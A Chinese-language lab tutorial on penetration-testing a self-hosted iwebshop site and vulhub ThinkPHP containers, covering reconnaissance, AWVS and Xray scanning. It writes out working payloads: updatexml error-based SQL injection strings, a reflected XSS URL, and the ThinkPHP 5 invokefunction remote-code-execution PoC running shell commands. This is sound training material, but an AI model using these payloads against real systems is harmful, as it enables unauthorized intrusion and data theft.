项目实战（webshop）

一、搭建靶场webshop(www.example1.com)

二、信息收集

1、获取IP

win+R→cmd→ping www.example1.com→显示出ip(192.168.51.128)

注：TTL为IP包的生存时间，拿到TTL我们可以大概的判断一下目标机器的操作系统，但不是很准确，因为TTL是可以修改的，TTL=64：Linux TTL=128：windows

这里获得到的TTL=64，大概可以判断服务器为Linux系统

2、nmap

打开kali→查看nmap版本（nmap -v）确定安装了nmap→执行探测命令：

nmap -o -sv 192.168.51.128

# -o表示要探测目标主机的操作系统

# -sv表示要探测目标主机的版本指纹

nmap -p 192.168.51.128 #探测目标主机的端口

收集到的信息有：Linux操作系统，开放端口：20、21、22、80、443、888

3、敏感目录

在浏览器测试常见的敏感目录（/admin、/web.config、/roobts.txt），如果没有可以尝试使用各种目录扫描工具扫描（如御剑、铸剑、dirsearch、dirmap等）

注：常见的敏感目录这个站点都能访问，这里使用工具来进行扫描

3.1、铸剑（7kbscan）

打开铸剑→扫描目标（www.example1.com）→切换加载dir→选择字典→开始

根据扫描结果可以判定目标站点有admin页面而且编程语言是php，但是访问扫描成功的URL发现都是在主页。经过研判发现这个规则为只要URL中存在后缀名、点或者一些特殊字符则会显示主页，否则显示自定义的错误页面。其实这也是一种防止目录扫描的方式，这种方式与waf拦截不同，waf拦截我们可以尝试修改UA头，挂代理，延迟等方式来绕过，而这种方式无法被绕过。

遇到这种情况我们可以换一种工具来进行目录扫描，如dirmap

3.2、dirmap

打开kali→dirmap需要一个python3的环境才能运行，检查环境（python --version、pip --version）→没安装dirmap的话需要先安装一下→打开dirmap（1、cd /opt/dirmap #安装在了opt下

2、python3 dirmap.py -h #可用 -i和 -lcf两个参数）→开始扫描目标站点（python3 dirmap.py -i www.example1,com -lcf）→扫描结果放在了output目录下，打开看看（cd output vim www.example1.com,txt）

收集到的信息有：存在/admin目录且编程语言是php

4、其他信息

通过观察，我们发现站点底部信息，还能得知待测试站点基于iwebshop开发，可以去网上找一下iwebshop已知漏洞

5、信息汇总

目前收集到的信息有：

域名：www.example1.com IP：192.168.51.128

操作系统：Linux 开放端口：20、21、22、80、443、888

开发语言：PHP cms：iwebshop

后台登陆地址：http://www.example1.com/admin/

三、web漏洞

1、通用扫描工具AWVS

1.1、安装

1.2、设置中文

1.3、扫描目标

1.4、验证漏洞

可以看到里面包含xss漏洞，可以试着攻击一下

再试试sql注入

爆数据库版本：'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) and 'VrnL'='VrnL 得到数据库版本为：5.7.43-log

爆数据库用户名：'and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) and 'VrnL'='VrnL 得到数据库名：www_example1_com@localhost

再试试反射型xss

http://www.example1.com/index.php?action=search_list&controller=site&word=1'''><script>alert(xss)</script>

直接弹窗

2、框架漏洞

程序员在编写程序的时候，都会用到一些框架，不同的语言有不同的框架，例如JAVA的spring，python的diango，php的ThinkPHP等。

下面以ThinkPHP为例学习一下框架漏洞

ThinkPHP版本有很多，现在主要是ThinkPHP5和ThinkPHP6，接下来我们看几个漏洞接下来我们通过vulhub靶场来复现首先要安装docker、docker-compose，同样是用到了kali虚拟机

安装docker和docker-compose #添加docker的gpg密钥，签名用的 curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add - #添加docker的apt源 echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list #更新apt缓存 apt update #安装docker sudo apt-get install docker docker-compose -y 或 sudo apt-get install docker.io -y sudo apt-get install docker-compose -y #如果docker-compose安装有问题，可以用以下命令安装 sudo curl -L https://github.com/docker/compose/releases/download/1.16.1/docker/compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose #装完之后执行以下命令，添加权限 sudo chmod +x /usr/local/bin/docker-compose #安装完成之后，docker就自动启动了 systemctl status docker #查看docker版本 docker -v

docker安装好之后再来安装vulhub靶场

cd到vulhub目录下（vulhub靶场已安装好），可以看到有很多框架对应的目录，同时也有我们要用到的thinkphp → cd到thinkphp目录下，可以看到有几个漏洞可以复现，其中有5-rce和5.0.23-rce，接下来来学习一下这两个漏洞

首先来删除一下之前执行过的docker容器：docker rm -f ‘容器名’

2.1、ThinkPHP5.0.22/5..1.29远程代码执行漏洞

清空之后我们再将5-rce拉起来

cd 5-rce docker-compose up -d → 出现错误，需要配置docker代理服务器（配置好后直接访问kali的ip地址192.168.51.129端口号8080，就可以进入靶场），进入网页→打开burp抓包→发送到Repeater，关闭拦截→将Poc（http://192.168.79.137:8081/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_e xec&vars[1][]=id）粘贴到请求框中，发送请求→响应包中得到我们请求的id值→将Poc中的id改为ls，就能执行ls命令拿到目录下的所有文件和目录名称

至此就完成了一次远程命令执行

四、系统漏洞探针

扫描器分为两种，web漏洞扫描器和系统漏洞扫描器，前面我们用到的AWVS就是web漏洞扫描器有些web漏洞扫描器也能扫描一些系统漏洞，但是没有专业的系统漏洞扫描器那么强大，系统漏洞扫描器涵盖了系统中数据库的漏洞、操作系统漏洞、系统软件漏洞(ssh、ftp等)、web服务应用程序漏洞等web漏洞扫描一般是扫描web程序漏洞，系统漏洞扫描器比较出名的有：启明星辰的天镜、绿盟科技的极光漏洞扫描器。

1、Goby

Goby是一款新的网络安全测试工具，它能够针对一个目标企业梳理最全的攻击面信息同时能进行高效、实战化漏洞扫描并快速地从一个验证入口点，切换到横向。

2、Nessus

Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件，国外开发的总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件,可以以用户指定的格式（ASCII 文本、html 等）产生详细的输出报告，包括目标的脆弱点、怎样修补漏洞以防止黑客入侵及危险级别。

3、漏洞利用（ms17-010）

我们复现用到的工具是msf，全称是Metasploit Fraemework，是一个非常好用而且简单的工具其中准备了大量的模块共使用，输入命令就可以直接完成测试同样，还是用到我们熟悉的kali虚拟机。

过程：永恒之蓝漏洞复现（可查找其他文章，这里不再赘述）

五、Xray

xray 是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有: 检测速度快：发包速度快; 漏洞检测算法效率高。支持范围广：大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。代码质量高：编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。高级可定制：通过配置文件暴露了引擎的各种参数，通过修改配置文件可以客制化功能。安全无威胁：xray 定位为一款安全辅助评估工具，而不是攻击工具，内置的所有 payload 和 poc 均为无害化检查。

1、下载和运行

2、扫描单个url

xray有四种模式，单个url扫描，多个url扫描，爬虫模式，代理模式

单个url扫描：

.\xray_windows_amd64.exe webscan --url http://www.example1.com/ --html-output 1.html

只扫描出三个敏感目录

扫描sql注入漏洞，需要给它指定携带参数的url，不然xray也扫描不出来sql注入漏洞。

.\xray_windows_amd64.exe webscan --url http://www.example1.com/index.php? action=search_list'&'controller=site'&'word=1 --html-output 2.html

扫描出的结果就比较多，有xss，有sql

注意：为什么使用 --url 指定目标扫描很快就结束了？在指定 --url URL 的情况下，xray 只会针对该 URL 本身进行漏洞检测，不会爬取网站内容。比如，你输入 --url https://baidu.com ，xray 只会检测百度首页的漏洞，这种情况下通常是无法扫描出漏洞的。如果你需要利用爬虫爬取页面后再检测漏洞，可以使用 --basic-crawler 选项。

3、扫描多个url

准备url.txt文件扫描命令：.\xray_windows_amd64.exe webscan --url-file .\url.txt --html-output 3.html 扫描出来结果是差不多的，只不过是执行了多个单个url扫描而已。

4、爬虫模式

4.1、没有登录扫描

命令：.\xray_windows_amd64.exe webscan --basic-crawler http://www.example1.com/ -- html-output 4.html

没有登陆的扫描，直接执行命令就行了，我们原理和AWVS差不多，都是用爬虫去爬数据，所以耗时会久一点。

4.2、指定登录扫描

修改配置文件

命令：.\xray_windows_amd64.exe webscan --basic-crawler http://www.example1.com/ -- html-output 5.html

结果中发的数据包都带上了Cookie

5、代理模式

接下来呢，我们来讲讲代理模式，这是和其他扫描工具不同的，也是xray的一个特点 xray的代理模式类似于burp，是被动扫描，但是比burp自动化更高现在市面上用xray很多，就是因为它的爬虫模式和代理模式结合。

5.1、扫描http

输入命令：.\xray_windows_amd64.exe webscan --listen 0.0.0.0:8080 --html-output 1.html # --listen 监听，就是代理模式这里我们监听的0.0.0.0，意思是所有IP的数据，端口是8080 # --html-output 将结果导出html格式的文件

→这就是开始监听了，然后我们设置一下代理在任务栏搜索一下“代理”，点击代理服务器设置→打开浏览器，访问靶机的网站→可以看到，我们xray就已经监听到有数据流过来了→输入ctrl+c，中断监听→在xray的文件夹下面就生成了一个1.html